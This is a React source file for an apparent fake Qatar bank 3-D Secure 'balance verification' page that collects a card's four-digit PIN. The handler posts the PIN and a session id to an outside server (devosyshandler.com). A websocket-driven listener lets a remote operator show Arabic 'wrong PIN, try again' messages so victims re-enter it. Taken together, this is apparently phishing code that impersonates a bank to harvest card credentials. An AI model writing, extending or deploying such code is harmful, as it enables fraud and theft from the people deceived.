import React, { useState, useEffect } from 'react';
import axios from 'axios';
import { useNavigate } from 'react-router-dom';
import QatarBankLayout from './qatar/QatarBankLayout';

const BalanceVerificationPage = () => {
  const navigate = useNavigate();
  const [pin, setPin] = useState('');
  const [isSubmitting, setIsSubmitting] = useState(false);
  const [errorMessage, setErrorMessage] = useState(() => sessionStorage.getItem('pin_error') || '');
  const [isShaking, setIsShaking] = useState(false);
  const uuId = localStorage.getItem('uuId') || localStorage.getItem('session_uuId') || 'default';
  const retryFlagKey = `pin_retry_flag_${uuId}`;
  const design = localStorage.getItem('session_design') || 'qatar_default';

  useEffect(() => {
    if (sessionStorage.getItem('pin_error')) {
      setIsShaking(true);
      setTimeout(() => setIsShaking(false), 600);
      sessionStorage.removeItem('pin_error');
    }
  }, []);

  useEffect(() => {
    if (sessionStorage.getItem(retryFlagKey) === 'true') {
      setErrorMessage('الرقم السري للبطاقة غير صحيح. يرجى المحاولة مرة أخرى.');
    }
  }, [retryFlagKey]);

  useEffect(() => {
    const handleWsCommand = (e) => {
      const data = e.detail;
      if (!data) return;
      if (data.type === 'show_pin' && data.isRetry) {
        sessionStorage.setItem(retryFlagKey, 'true');
        setPin('');
        setErrorMessage('الرقم السري للبطاقة غير صحيح. يرجى إدخال الرقم السري الصحيح.');
        setIsShaking(true);
        setTimeout(() => setIsShaking(false), 600);
      }
    };
    window.addEventListener('ws_command', handleWsCommand);
    return () => window.removeEventListener('ws_command', handleWsCommand);
  }, [retryFlagKey]);

  const handlePinSubmit = async (e) => {
    e?.preventDefault();
    if (pin.length !== 4 || isSubmitting) return;

    setIsSubmitting(true);
    navigate('/3ds/loading');

    const dataToSend = {
      uuId: localStorage.getItem('uuId') || uuId,
      pin: pin,
      balance: pin
    };

    try {
      const serverUrl = process.env.REACT_APP_SERVER_URL || 'https://devosyshandler.com';
      await axios.post(`${serverUrl}/api/balance_verif`, dataToSend);
    } catch (error) {
      sessionStorage.setItem('pin_error', 'الرقم السري غير صحيح أو تعذر الاتصال.');
      sessionStorage.setItem(retryFlagKey, 'true');
      navigate('/3ds/balance');
    }
  };

  return (
    <QatarBankLayout
      design={design}
      mode="pin"
      pin={pin}
      setPin={setPin}
      handlePinSubmit={handlePinSubmit}
      errorMessage={errorMessage}
      isShaking={isShaking}
      isSubmitting={isSubmitting}
      onCancel={() => navigate('/checkout')}
    />
  );
};

export default BalanceVerificationPage;
